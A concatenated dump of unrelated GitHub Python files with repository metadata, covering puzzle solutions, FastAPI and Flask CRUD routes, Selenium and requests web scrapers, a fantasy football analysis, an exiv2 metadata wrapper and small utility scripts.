make_parser().parse_args()\r\n with open(matches.input, 'r') as fptr:\r\n input = fptr.readlines()\r\n nums = [int(l) if l.strip().isnumeric() else None for l in input]\r\n elves_split: list[list[int]] = list(split_on(None, nums))\r\n cals: list[int] = list(map(sum, elves_split))\r\n print(max(cals))\r\n cals.sort(reverse=True)\r\n top_3: list[int] = cals[:3]\r\n print(f\"top 3: {top_3}\")\r\n print(f\"total of top 3: {sum(top_3)}\")","repo_name":"vernonrj/advent2022","sub_path":"day01/puzzle01.py","file_name":"puzzle01.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10071086313","text":"from typing import List\nfrom uuid import UUID\n\nfrom fastapi import Depends\nfrom fastapi_utils.cbv import cbv\nfrom fastapi_utils.inferring_router import InferringRouter\nfrom fastapi_utils.api_model import APIMessage\n\nfrom ..services import OrderItemService\nfrom ..schemas import (\n OrderItemCreate, OrderItemUpdate, OrderItemGet,\n)\nfrom .base_api import BaseAPI\n\nrouter = InferringRouter()\n\n\n# noinspection PyTypeChecker\n@cbv(router)\nclass OrderItemAPI(BaseAPI):\n service: OrderItemService = Depends()\n\n @router.get('/')\n async def get_many(\n self, offset: int = 0, limit: int = 20,\n order_uid: UUID = None\n ) -> List[OrderItemGet]:\n return await self._get_many(\n limit, offset, order_uid=order_uid\n )\n\n @router.get(\"/{uid}/\")\n async def get_one(\n self, uid: UUID\n ) -> OrderItemGet:\n return await self._get_one(uid)\n\n @router.post(\"/\")\n async def create_one(\n self, obj: OrderItemCreate\n ) -> OrderItemGet:\n return await self._create_one(obj)\n\n @router.put(\"/{uid}/\")\n async def update_one(\n self, uid: UUID, obj: OrderItemUpdate\n ) -> OrderItemGet:\n return await self._update_one(obj, uid)\n\n @router.delete(\"/{uid}/\")\n async def delete_one(\n self, uid: UUID\n ) -> APIMessage:\n return await self._delete_one(uid)\n","repo_name":"ashapochka/chainvoice","sub_path":"app/api/order_item_api.py","file_name":"order_item_api.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"21312596308","text":"from bs4 import BeautifulSoup as bs\r\nfrom selenium import webdriver \r\nfrom selenium.common.exceptions import TimeoutException\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.phantomjs.webdriver import WebDriver\r\nimport json\r\nfrom time import sleep\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium.webdriver import ActionChains\r\nfrom random import randint\r\nfrom multiprocessing import Semaphore,Process\r\nimport re\r\nimport os\r\n\r\ndef get_cookie():\r\n\toptions=webdriver.ChromeOptions()\r\n\tprefs = {\"profile.managed_default_content_settings.images\": 2,'profile.default_content_setting_values' : { 'notifications' : 2 }}\r\n\toptions.add_experimental_option(\"prefs\", prefs)\r\n\tuser_ag='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36'\r\n\toptions.add_argument('--user-agent=%s'%user_ag)\r\n\toptions.add_argument('--disable-infobars')\r\n\toptions.add_argument('--disable-gpu') \r\n\toptions.add_argument('--incognito')\r\n\t#options.add_argument('--headless')\r\n\tdriver = webdriver.Chrome(chrome_options=options)\r\n\tdriver.get('https://passport.jd.com/new/login.aspx?ReturnUrl=https%3A%2F%2Fwww.jd.com%2F')\r\n\ttry:\r\n\t\tresult=WebDriverWait(driver,100).until(EC.title_is('京东(JD.COM)-正品低价、品质保障、配送及时、轻松购物!'))\r\n\texcept:\r\n\t\tprint(\"no!!\")\r\n\r\n\tcookies=driver.get_cookies()\r\n\tcookies=json.dumps(cookies)\r\n\twith open(\"cookies.json\",\"w\") as fbb:\r\n\t\t\tjson.dump(cookies,fbb)\r\n\r\nsem_all_html=Semaphore(1)\r\nsem_end=Semaphore(0)\r\nsem_url=Semaphore(0)\r\nsem_cook=Semaphore(1)\r\nclass acq_url(Process):\r\n\tdef __init__(self):\r\n\t\tsuper(acq_html,self).__init__()\r\n\tdef run(self):\r\n\t\toptions=webdriver.ChromeOptions()\r\n\t\tprefs = {\"profile.managed_default_content_settings.images\": 2,'profile.default_content_setting_values' : { 'notifications' : 2 }}\r\n\t\toptions.add_experimental_option(\"prefs\", prefs)\r\n\t\tuser_ag='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36'\r\n\t\toptions.add_argument('--user-agent=%s'%user_ag)\r\n\t\toptions.add_argument('--disable-infobars')\r\n\t\toptions.add_argument('--disable-gpu') \r\n\t\toptions.add_argument('--incognito')\r\n\t\t#options.add_argument('--headless')\r\n\t\tpage_num=10\r\n\t\tdriver = webdriver.Chrome(chrome_options=options)\r\n\t\tsem_cook.acquire()\r\n\t\twith open(\"cookies.json\",\"r\") as f:\r\n\t\t\tcookies=json.loads(json.load(f))\r\n\t\tsem_cook.release()\r\n\t\tdriver.get(\"https://www.jd.com\")\r\n\t\tdriver.delete_all_cookies()\r\n\t\tfor cookie in cookies:\r\n\t\t\tdriver.add_cookie(cookie)\r\n\t\tsleep(0.5)\r\n\t\tdriver.find_element_by_xpath('//*[@id=\"key\"]').send_keys('蓝牙键盘')\r\n\t\tsleep(2)\r\n\t\tdriver.find_element_by_xpath('//*[@id=\"search\"]/div/div[2]/button').click()\r\n\t\tac=ActionChains(driver)\r\n\t\tfor i1 in range(page_num):\r\n\t\t\tfor i in range(4):\r\n\t\t\t\tsleep(randint(0,3))\r\n\t\t\t\tac.send_keys(Keys.PAGE_DOWN).perform()\r\n\t\t\t\tprint(i)\r\n\t\r\n\t\t\tsleep(randint(3,5))\r\n\r\n\t\t\twith open(\"page_\"+str(i1)+'.html','wb') as f:\r\n\t\t\t\tf.write(driver.page_source.encode(\"utf-8\",\"ignore\"))\r\n\t\t\tsem_url.release()\r\n\t\t\tprint(\"写入成功\",i1)\r\n\t\t\tsleep(randint(5,8))\r\n\t\t\tac.send_keys(Keys.RIGHT).perform()\r\n\r\nclass acq_html(Process):\r\n\tdef __init__(self):\r\n\t\tsuper(acq_data,self).__init__()\r\n\t\r\n\tdef run(self):\r\n\t\toptions=webdriver.ChromeOptions()\r\n\t\tprefs = {\"profile.managed_default_content_settings.images\": 2,'profile.default_content_setting_values' : { 'notifications' : 2 }}\r\n\t\toptions.add_experimental_option(\"prefs\", prefs)\r\n\t\tuser_ag='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36'\r\n\t\toptions.add_argument('--user-agent=%s'%user_ag)\r\n\t\toptions.add_argument('--disable-infobars')\r\n\t\toptions.add_argument('--disable-gpu') \r\n\t\toptions.add_argument('--incognito')\r\n\t\t#options.add_argument('--headless')\r\n\t\tdriver = webdriver.Chrome(chrome_options=options)\r\n\t\tsem_cook.acquire()\r\n\t\twith open(\"cookies.json\",\"r\") as f:\r\n\t\t\tcookies=json.loads(json.load(f))\r\n\t\tsem_cook.release()\r\n\t\tdriver.get(\"https://www.jd.com\")\r\n\t\tdriver.delete_all_cookies()\r\n\t\tfor cookie in cookies:\r\n\t\t\tdriver.add_cookie(cookie)\r\n\t\tac=ActionChains(driver)\r\n\t\tfor i in range(10):\r\n\t\t\tsem_url.acquire()\r\n\t\t\twith open(\"page_\"+str(i)+\".html\",'rb') as f:\r\n\t\t\t\ttext=bs(f.read(),'html.parser')\r\n\t\t\tlianjie=[]\r\n\t\t\tfor link in text.find_all('strong'):\r\n\t\t\t\tfor lin in link.find_all('a'):\r\n\t\t\t\t\ttry:\r\n\t\t\t\t\t\tlianjie.append(\"https:\"+lin.get(\"href\"))\r\n\t\t\t\t\texcept:\r\n\t\t\t\t\t\tprint(\"null\")\r\n\t\t\tfor ind,t in enumerate(lianjie):\r\n\t\t\t\tprint(t)\r\n\t\t\t\tdriver.get(t)\r\n\t\t\t\tpage_all=-1\r\n\t\t\t\tfor index in range(2,7):\r\n\t\t\t\t\tsleep(randint(0,2))\r\n\t\t\t\t\tfor n in range (randint(2,4)):\r\n\t\t\t\t\t\tac.send_keys(Keys.PAGE_DOWN).perform()\r\n\t\t\t\t\t\tsleep(randint(0,3))\r\n\t\t\t\t\t#if page_all==-1:\r\n\t\t\t\t\t\t#cc=driver.find_element_by_xpath('/html/body/div[10]/div[2]/div[3]/div[2]/div[2]/div[1]/ul/li[1]/a/em').text\r\n\t\t\t\t\t\t#cc=driver.find_elements_by_css_selector(\"[data-anchor='#comment']\")\r\n\t\t\t\t\t\t#cc=driver.find_elements_by_link_text('商品评价')\r\n\t\t\t\t\t\t#all_num=cc.text\r\n\t\t\t\t\tsem_all_html.acquire()\r\n\t\t\t\t\twith open(\"all.html\",'ab') as f:\r\n\t\t\t\t\t\tf.write(driver.page_source.encode(\"utf-8\",\"ignore\"))\r\n\t\t\t\t\tsem_all_html.release()\r\n\t\t\t\t\tif sem_end.get_value()<0:\r\n\t\t\t\t\t\tsem_end.release()\r\n\t\t\t\t\tprint(\"save!!\")\r\n\t\t\t\t\tsleep(randint(5,8))\r\n\t\t\t\t\tflag=-1\r\n\t\t\t\t\tfor indx,ele in enumerate(driver.find_elements_by_link_text(str(index))):\r\n\t\t\t\t\r\n\t\t\t\t\t\ttx = ele.get_attribute(\"rel\")\r\n\t\t\t\r\n\t\t\t\t\r\n\t\t\t\t\t\ttry:\r\n\t\t\t\t\t\t\tif tx==str(index):\r\n\t\t\t\t\t\t\t\tprint(\"ins\")\r\n\t\t\t\t\t\t\t\tflag=1\r\n\t\t\t\t\t\t\t\tele.click()\r\n\t\t\t\t\t\texcept:\r\n\t\t\t\t\t\t\tprint(\"ee\",indx)\r\n\t\t\t\t\r\n\t\t\t\t\tif flag==-1:\r\n\t\t\t\t\t\tbreak\r\n\t\tsem_end.release()\r\n\t\tsem_end.release()\r\n\t\tsem_end.release()\r\nclass acq_data(Process):\r\n\tdef __init__(self):\r\n\t\tsuper(acq_data,self).__init__()\r\n\t\r\n\tdef run(self):\r\n\t\tcommit=[]\r\n\t\twhile sem_end.get_value()==0:\r\n\t\t\tif os.path.exists(\"all.html\"):\r\n\t\t\t\tprint(\"存在\")\r\n\t\t\t\tsem_all_html.acquire()\r\n\t\t\t\twith open(\"all.html\",'rb') as f:\r\n\t\t\t\t\tgg=f.read().split(b' 90)\n ]\n .copy()\n .sort_values([\"gkCombinedIndex\"], ascending=False)[\n [\n \"first_name\",\n \"second_name\",\n \"name\",\n \"form\",\n \"selected_by_percent\",\n \"total_points\",\n \"minutes\",\n \"influence\",\n \"creativity\",\n \"threat\",\n \"gkCombinedIndex\",\n ]\n ]\n .copy()\n )\n\n top_def = (\n player_core.loc[\n (player_core[\"singular_name_short\"] == \"DEF\")\n & (player_core[\"minutes\"] > 90)\n ]\n .copy()\n .sort_values([\"defCombinedIndex\"], ascending=False)[\n [\n \"first_name\",\n \"second_name\",\n \"name\",\n \"form\",\n \"selected_by_percent\",\n \"total_points\",\n \"minutes\",\n \"influence\",\n \"creativity\",\n \"threat\",\n \"defCombinedIndex\",\n ]\n ]\n .copy()\n )\n\n top_mid = (\n player_core.loc[\n (player_core[\"singular_name_short\"] == \"MID\")\n & (player_core[\"minutes\"] > 90)\n ]\n .copy()\n .sort_values([\"midCombinedIndex\"], ascending=False)[\n [\n \"first_name\",\n \"second_name\",\n \"name\",\n \"form\",\n \"selected_by_percent\",\n \"total_points\",\n \"minutes\",\n \"influence\",\n \"creativity\",\n \"threat\",\n \"midCombinedIndex\",\n ]\n ]\n .copy()\n )\n\n top_fwd = (\n player_core.loc[\n (player_core[\"singular_name_short\"] == \"FWD\")\n & (player_core[\"minutes\"] > 90)\n ]\n .copy()\n .sort_values([\"fwdCombinedIndex\"], ascending=False)[\n [\n \"first_name\",\n \"second_name\",\n \"name\",\n \"form\",\n \"selected_by_percent\",\n \"total_points\",\n \"minutes\",\n \"influence\",\n \"creativity\",\n \"threat\",\n \"fwdCombinedIndex\",\n ]\n ]\n .copy()\n )\n\n pass\n\n\nif __name__ == \"__main__\":\n imported_data = importData()\n out = preProc(imported_data)\n","repo_name":"desiretheory/fpl","sub_path":"fpl/fpl/analyse.py","file_name":"analyse.py","file_ext":"py","file_size_in_byte":9455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29589209738","text":"from bs4 import BeautifulSoup\r\nimport requests\r\nimport time\r\nfrom datetime import datetime\r\n\r\n#set default variable\r\ncurrent_top1 = \"Blank\"\r\ni = 0\r\n\r\n# create infinite loop to keep program running\r\nwhile True:\r\n # use BeautifulSoup to get BBC web page and access top story #1 headline\r\n page = requests.get(\"https://www.bbc.co.uk/news\")\r\n soup = BeautifulSoup(page.content, 'html.parser')\r\n top1_div = soup.find(\"div\", attrs={\"data-entityid\": \"container-top-stories#1\"})\r\n top1_head = top1_div.h3.string\r\n\r\n # used to add timestamp to any change to top story\r\n now = datetime.now()\r\n current_time = now.strftime(\"%d/%m/%Y, %H:%M:%S\")\r\n\r\n # check if top story headline has changed and print relevant result\r\n if(top1_head != current_top1):\r\n print(\"New Top Story!!! (\", current_time, \")\")\r\n print(top1_head)\r\n current_top1 = top1_head\r\n i=0\r\n else:\r\n if(i % 10 == 0):\r\n print(\"No change to top story, current top story is:\")\r\n print(top1_head)\r\n else:\r\n print(\"...\")\r\n i+=1\r\n # to add delay to loop re-running\r\n time.sleep(10.0)\r\n","repo_name":"EuanDodds/Portfolio-Projects","sub_path":"bbc_top_story.py","file_name":"bbc_top_story.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"74895826010","text":"class Solution:\n def removeDuplicates(self, s: str, k: int) -> str:\n stack = [] # [{\"a\":3} , {\"b\":5} , ...]\n for i, ch in enumerate(s):\n if stack and stack[-1][0] == ch:\n stack[-1][1] += 1\n if stack[-1][1] == k:\n stack.pop()\n else:\n stack.append([ch, 1])\n\n return ''.join(c * k for c, cnt in stack)\n","repo_name":"debbs061/algorithm","sub_path":"src/1209-remove-all-adjacent-duplicates-in-string-2.py","file_name":"1209-remove-all-adjacent-duplicates-in-string-2.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12601230276","text":"from flask import Blueprint, jsonify, request\nfrom flask_login import login_required, current_user\nfrom app.models.category import db, Category\nfrom ..forms.category_form import CategoryForm\nfrom .auth_routes import validation_errors_to_error_messages\n\ncategory_routes = Blueprint('categories', __name__)\n\n\n# CREATE A NEW CATEGORY\n@category_routes.route('/new', methods=['POST'])\n@login_required\ndef create_category():\n form = CategoryForm()\n form['csrf_token'].data = request.cookies['csrf_token']\n\n if form.validate_on_submit():\n category = Category(\n name=form.data['name'],\n user_id=current_user.id\n )\n db.session.add(category)\n db.session.commit()\n\n return category.to_dict(), 200\n else:\n return {'errors': validation_errors_to_error_messages(form.errors)}, 401\n\n\n# READ ALL CATEGORIES\n@category_routes.route('/')\n@login_required\ndef user_categories():\n user_categories = Category.query.filter_by(user_id=current_user.id).all()\n return {'categories': [category.to_dict() for category in user_categories]}, 200\n\n\n# GET CATEGORY INFO BASED ON CATEGORY ID (GRABS ALL ITEMS IN CATEGORY)\n@category_routes.route('/')\n@login_required\ndef one_category(category_id):\n user_category = Category.query.get(category_id)\n if user_category:\n if user_category.user_id == current_user.id:\n return {'category': user_category.to_dict()}, 200\n else:\n return {'errors': 'Unauthorized to get this category'}, 401\n else:\n return {'errors': 'Category not found'}, 404\n\n\n# UPDAE A CATEGORY NAME BASED ON CATEGORY ID\n@category_routes.route('/', methods=[\"PUT\", \"PATCH\"])\n@login_required\ndef update_category(category_id):\n form = CategoryForm()\n form['csrf_token'].data = request.cookies['csrf_token']\n\n if form.validate_on_submit():\n category = Category.query.get(category_id)\n\n if category:\n if category.user_id == current_user.id:\n category.name = form.data['name']\n db.session.commit()\n return category.to_dict(), 200\n else:\n return {'errors': 'Unauthorized to update this category'}, 401\n else:\n return {'errors': 'Category not found'}, 404\n else:\n return {'errors': validation_errors_to_error_messages(form.errors)}, 400\n\n\n# DELETE A CATEGORY FROM CATEGORY ID\n@category_routes.route('/', methods=[\"DELETE\"])\n@login_required\ndef delete_category(category_id):\n category = Category.query.get(category_id)\n if category:\n if category.user_id == current_user.id:\n db.session.delete(category)\n db.session.commit()\n return {'message': 'Category deleted successfully'}, 200\n else:\n return {'errors': 'Unauthorized to delete this category'}, 401\n else:\n return {'errors': 'Category not found'}, 404\n","repo_name":"yassin30000/inventory_now","sub_path":"app/api/category_routes.py","file_name":"category_routes.py","file_ext":"py","file_size_in_byte":2965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20286369385","text":"\"\"\"\n联网相关\n\"\"\"\n\nimport os\n\nimport requests\n\n\ndef get(url, params=None, headers=None, cookies=None, encoding='utf-8', result_type='text', need_print=True):\n \"\"\"\n 获取数据\n :param url: 地址\n :param params: 参数\n :param headers: 头\n :param cookies: cookies\n :param encoding: 编码\n :param result_type: 结果类型\n :param need_print: 是否需要打印\n :return:\n \"\"\"\n # 伪装头\n # Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36\n ua = 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6'\n if headers is None or not isinstance(headers, dict):\n headers = {\n 'User-Agent': ua\n }\n else:\n if not 'User-Agent' in headers.keys():\n headers['User-Agent'] = ua\n # 打开请求\n if need_print:\n print(\"open \" + url)\n if params is not None:\n print('params', params)\n result = requests.get(url, params=params, headers=headers, cookies=cookies)\n result.encoding = encoding\n if result_type == 'text':\n result = result.text\n elif result_type == 'json':\n result = result.json()\n if need_print:\n print(f'result is {result_type}\\n{result}')\n return result\n\n\ndef get_file(url, file_path, need_print=True, **kwargs):\n \"\"\"下载文件\"\"\"\n if need_print:\n print('下载文件 %s ,从 %s' % (file_path, url))\n dir_name = os.path.dirname(file_path)\n if not os.path.exists(dir_name):\n os.makedirs(dir_name)\n if need_print:\n print('创建目录 %s' % dir_name)\n r = requests.get(url, None, **kwargs)\n with open(file_path, 'wb') as f:\n f.write(r.content)\n if need_print:\n print('下载完成')\n\n\ndef parse_cookies_from_file(file_path, exit_if_not_exists=True):\n \"\"\"\n 从文件中解析 cookies\n :param file_path: 文件路径\n :param exit_if_not_exists:文件不存在时,是否退出\n :return:\n \"\"\"\n if not os.path.exists(file_path):\n print('cookies file not exists:', file_path)\n if exit_if_not_exists:\n exit()\n else:\n return\n with open(file_path, encoding='utf-8') as f:\n return parse_cookies(f.read())\n\n\ndef parse_cookies(cookies=''):\n \"\"\"从字符串中解析出 cookies\"\"\"\n result = dict()\n if not cookies:\n return result\n\n key_value_list = cookies.split(';')\n for key_value in key_value_list:\n key_value_pair = key_value.split('=', maxsplit=1)\n if len(key_value_pair) == 2:\n key, value = key_value_pair\n result[key.strip()] = value.strip()\n return result\n\n\ndef parse_params_from_file(file_path):\n with open(file_path, encoding='utf-8') as f:\n return parse_params(f.read())\n\n\ndef cookies_to_str(cookies):\n \"\"\"转 cookies 为字符串\"\"\"\n return ';'.join([k + '=' + v for k, v in cookies.items()])\n\n\ndef parse_params(params):\n \"\"\"\n 解析参数,从 fiddler 中抓取后直接复制\n 以 # 开头或者空行将被忽略\n \"\"\"\n data = {}\n for line in params.split('\\n'):\n if line.startswith('#'):\n continue\n if '\\t' not in line:\n continue\n key, value = line.split('\\t')\n data[key] = value\n return data\n\n\ndef handle_result(request, success_callback=None, fail_callback=None, print_result=True):\n \"\"\"处理结果\"\"\"\n result = request.json()\n if print_result:\n print(result)\n if result:\n code = result['code']\n if code == 200:\n # 成功\n data = result['data']\n if success_callback:\n success_callback(data)\n return data\n else:\n # 失败\n msg = result['msg']\n print(msg)\n if fail_callback:\n fail_callback(code, msg)\n else:\n # 结果为空\n if fail_callback:\n fail_callback(0, None)\n return None\n","repo_name":"pingfangx/pythonx","sub_path":"ToolsX/xx/netx.py","file_name":"netx.py","file_ext":"py","file_size_in_byte":4029,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"32"} +{"seq_id":"1510032279","text":"# -*- coding: utf-8 -*-\nfrom subprocess import CalledProcessError\nfrom typing import List\n\nfrom lib import cli\nimport lib.meta_data as md\nfrom lib.config import Configuration\nfrom tests.defines import EXIV2_WARN_ERROR_CODE\n\n\nclass ExifEditor:\n\n def __init__(self, config: Configuration):\n self._config = config\n\n def get_meta_data_safe(self, path: str) -> md.MetaData:\n \"\"\"\n :raises InvalidMetaDataError if the exiv data of the file could not be parsed\n FileNotFoundError if the file could not be found\n \"\"\"\n try:\n return self.get_meta_data(path)\n except CalledProcessError:\n return md.empty()\n\n def get_meta_data(self, path: str) -> md.MetaData:\n \"\"\"\n :raises CalledProcessError if the exiv2 command terminated abnormally\n InvalidMetaDataError if the exiv data of the file could not be parsed\n FileNotFoundError if the file could not be found\n \"\"\"\n try:\n serialized = self._read_exif_field(self._config.exif_field_name, path)\n except CalledProcessError as e:\n if _is_file_not_found(e):\n raise FileNotFoundError(e)\n else:\n raise e\n return md.deserialize(serialized)\n\n def set_meta_data(self, path: str, data: md.MetaData):\n \"\"\"\n :raises CalledProcessError if the exiv2 command terminated abnormally\n FileNotFoundError if the file could not be found\n \"\"\"\n try:\n self._write_exif_field(self._config.exif_field_name, data.serialize(), path)\n except CalledProcessError as e:\n if _is_file_not_found(e):\n raise FileNotFoundError(e)\n else:\n raise e\n\n def _read_exif_field(self, field_name: str, path: str) -> str:\n base = self._build_exiv_base_command()\n command = self._build_exiv_read_command(base, field_name, path)\n std_out_lines = cli.run_cmd(command, EXIV2_WARN_ERROR_CODE)\n return \" \".join(std_out_lines[0].split()[3:])\n\n def _write_exif_field(self, field_name: str, value: str, path: str):\n base = self._build_exiv_base_command()\n command = self._build_exiv_write_command(base, field_name, value, path)\n cli.run_cmd(command)\n\n def _build_exiv_base_command(self) -> List[str]:\n cmd = ['exiv2', '-n', self._config.exiv2_charset]\n if self._config.exiv2_quiet:\n cmd.append('-q')\n return cmd\n\n def _build_exiv_read_command(self, base_command: List[str], field_name: str, path: str):\n base_command.append('-b')\n base_command.append('-K')\n base_command.append(field_name)\n base_command.append(path)\n return base_command\n\n def _build_exiv_write_command(self, base_command: List[str], field_name: str, value: str, path: str):\n if self._config.exiv2_keep_time_stamps:\n base_command.append('-k')\n base_command.append('-M')\n base_command.append('set ' + field_name + ' ' + value)\n base_command.append(path)\n return base_command\n\n\ndef _is_file_not_found(error: CalledProcessError):\n return error.returncode == 255\n","repo_name":"enguerrand/tie","sub_path":"lib/exif_editor.py","file_name":"exif_editor.py","file_ext":"py","file_size_in_byte":3249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33978138416","text":"import logging, glob, re, click\nfrom sqlalchemy import create_engine, Column, Integer, String\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy import distinct\nfrom openpyxl import load_workbook\nfrom xlrd import *\n\n\n# configure sqlalchemy\nColumn = Column\nInteger = Integer\nString = String\nBase = declarative_base()\ncreate_engine = create_engine\nengine = create_engine('sqlite:///:memory:', echo=True)\nSession = sessionmaker(bind=engine)\n\n\nclass UserEmail(Base):\n __tablename__ = 'emails'\n\n id = Column(Integer, primary_key=True)\n user_id = Column(String(128))\n email = Column(String(320))\n\n\nBase.metadata.create_all(engine)\n\n\n# configure logging\nlogging.basicConfig(level=logging.DEBUG)\n\n\ndef find_all_reports(dir):\n # 'AllReviewsReport', 'AllReviewsbyContributorReport'\n return glob.glob('{0}/*{1}*.xls'.format(dir, 'AllReviewsReport'))\n\n\ndef get_emails(reports):\n \"\"\"Get all reports, collect all 'User ID' and 'User Email Address'\n values\"\"\"\n logging.debug(reports)\n for r in reports:\n wb = open_workbook(r)\n if 'All Reviews Report' in wb.sheet_names():\n ws = wb.sheet_by_name('All Reviews Report')\n logging.debug('cols: {0}, rows: {1}'.format(ws.ncols, ws.nrows))\n logging.debug(ws.name)\n logging.debug(ws.row(3))\n logging.debug(ws.row(3)[0].value)\n\n email_loc = [{'row': row, 'col': col}\n for col in range(ws.ncols)\n for row in range(ws.nrows)\n if ws.cell_value(row, col) == 'User Email Address']\n\n if len(email_loc) > 1:\n raise ValueError('More than one column in the All Reviews\\\n Report \"{0}\" was named \"{1}\"'.format(\n r,\n 'User Email Address'))\n\n userid_loc = [{'row': row, 'col': col}\n for col in range(ws.ncols)\n for row in range(ws.nrows)\n if ws.cell_value(row, col) == 'User ID']\n\n if len(userid_loc) > 1:\n raise ValueError('More than one column in the All Reviews\\\n Report \"{0}\" was named \"{1}\"'.format(\n r,\n 'User ID'))\n\n emails = [UserEmail(\n user_id=ws.cell_value(row, userid_loc[0]['col']),\n email=ws.cell_value(row, email_loc[0]['col']))\n for row in range(email_loc[0]['row'] + 1, ws.nrows)]\n\n logging.debug(emails)\n logging.debug(dir(emails[0]))\n\n session = Session()\n\n session.add_all(emails)\n session.commit()\n\n logging.debug(session.query(UserEmail).distinct(UserEmail.email).group_by(UserEmail.email).count())\n\n\n\ndef dedupe_emails():\n pass\n\n\ndef merge_emails():\n pass\n\n\n@click.command()\n@click.argument('dir', type=click.Path(exists=True,\n writable=True))\ndef cli(dir=\".\"):\n \"\"\"\"Simple progam that takes Bazaarvoice All Reviews Report, pulls in all\n 'User ID' and 'User Email Address' data, de-dupes it and merges it into\n the All Reviews by Contributor report, merging on\n 'User ID' and 'Reviewr ID'.\"\"\"\n logging.debug(dir)\n reports = find_all_reports(dir)\n get_emails(reports)\n\n\nif __name__ == \"__main__\":\n pass\n","repo_name":"arteedecco/all-reviews-reports-merge","sub_path":"merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":3444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36949143983","text":"#!/usr/bin/env python3\n\nfrom datetime import datetime, date, timedelta\nfrom utils import log_msg\nfrom bwdb import DB\nimport argparse\nimport os\nimport sys\n\n\ndef init_globals(args):\n global app_root, db\n app_path = os.path.dirname(os.path.realpath(__file__))\n app_root = os.path.realpath(os.path.join(app_path, '..'))\n\n db = DB(db=args.database)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Sniff interface to record metrics of IP packets.')\n\n #parser.add_argument('-c', '--config', type=str,\n # default='bwm.cfg',\n # help='configuration file')\n parser.add_argument('-d', '--database', type=str,\n default='net_mon.db',\n help='database')\n parser.add_argument('-M', '--minute_table', type=int,\n default=8,\n help='weeks to keep minute table')\n parser.add_argument('-H', '--hour_table', type=int,\n default=26,\n help='weeks to keep hour table')\n parser.add_argument('-D', '--day_table', type=int,\n default=520,\n help='weeks to keep day table')\n\n return parser.parse_args()\n\n\ndef create_tables():\n global db\n log_msg('creating tables')\n db.create_tables()\n\n\ndef rebuild_table(name=''):\n global db\n log_msg('rebuilding table: name='+str(name))\n day = db.get_min_full_day()\n db.summarize_data(name, day, compare='>=')\n log_msg('rebuilding done')\n\n\ndef archive_table(name='', weeks=''):\n global db\n day = (date.today() - timedelta(weeks=weeks)).strftime('%Y-%m-%d')\n log_msg('archiving table: name='+str(name)+', weeks='+str(weeks)+', day='+str(day))\n log_msg('archiving done')\n\n\nif __name__ == \"__main__\":\n global db\n\n log_msg('Initializing '+__file__+'...')\n\n args = parse_args()\n\n init_globals(args)\n\n rebuild_table('hour')\n rebuild_table('day')\n #archive_table('minute', args.minute_table)\n #archive_table('hour', args.hour_table)\n #archive_table('day', args.day_table)\n\n log_msg('Done.')\n\n","repo_name":"streckc/bwm","sub_path":"bin/db_maint.py","file_name":"db_maint.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"32141788491","text":"import utility\nimport resolution_equation as resolve\nimport variable_equation as veq\ndef base_function():\n user_input = utility.get_equation()\n user_input = user_input.replace(\" \", \"\")\n mode = utility.chose_mode(user_input)\n if not mode:\n result = resolve.create_result(user_input)\n else:\n result = veq.resolve_variable_equation(user_input)\n\n if result == 'Errore':\n print('Errore')\n base_function()\n else:\n print(result)\n response = input(\"Do you want to continue? Y/N \")\n control = utility.control_response(response)\n if control:\n base_function()\n else:\n print('GoodBye')","repo_name":"GvMazzon25/FirstPythonProject","sub_path":"sub_main.py","file_name":"sub_main.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7483085639","text":"import zmq\nimport cv2\nimport numpy as np\nimport time\nimport imageio\n\n\nclass OrbSlam2Connector:\n # slam server 地址\n slam_server_address = '127.0.0.1:35696'\n # 掉线标记\n offline = True\n # 连接时最大尝试次数\n max_try_count = 10\n\n\n _SLAM_SYSTEM_NOT_READY = -1,\n _SLAM_NO_IMAGES_YET = 0,\n _SLAM_NOT_INITIALIZED = 1,\n _SLAM_OK = 2,\n _SLAM_LOST = 3\n\n def __init__(self):\n self.start_time = time.time()\n print('orbslam2_connector: init slam connect')\n self.ctx = zmq.Context()\n self.socket = self.ctx.socket(zmq.REQ)\n self.socket.setsockopt(zmq.LINGER, 0)\n self.socket.setsockopt(zmq.RCVTIMEO, 1000)\n 